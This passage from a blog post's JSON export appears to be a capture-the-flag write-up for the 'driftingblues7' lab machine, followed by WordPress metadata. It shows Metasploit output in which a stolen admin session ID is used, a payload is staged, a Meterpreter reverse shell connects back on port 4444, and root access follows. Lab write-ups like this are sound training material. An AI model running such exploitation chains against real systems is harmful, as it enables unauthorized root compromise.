has at least one active session.\n[*] Calculating the admin &#039;session_id&#039; value. 
This will take a while...\n[+] Obtained admin &#039;session_id&#039; value: 358748692\n[*] Command Stager progress - 100.00% done (897\/897 bytes)\n[*] Sending stage (3045380 bytes) to 172.20.10.6\n[*] Meterpreter session 1 opened (172.20.10.8:4444 -&gt; 172.20.10.6:33520) at 2024-04-12 06:08:35 -0400\n\nmeterpreter &gt; cd \/tmp\nmeterpreter &gt; shell\nProcess 25767 created.\nChannel 1 created.\nwhoami\nroot\nscript -c bash \/dev\/null\n[root@driftingblues tmp]# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n[root@driftingblues tmp]# cd \/root\n[root@driftingblues ~]# ls\nanaconda-ks.cfg  eon  index.htm  index_files  root.txt  upit.sh  user.txt<\/code><\/pre>\n<p>That gets a shell, and with that the box is done. The earlier script failing only means that I failed; I probably made a mistake somewhere. If anyone knows what went wrong, please let me know!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues7 Information Gathering Port Scan rustscan -a 172.20.10.6 &#8212; -A  
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-538","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/538","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=538"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/538\/revisions"}],"predecessor-version":[{"id":541,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/538\/revisions\/541"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=538"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=538"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=538"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}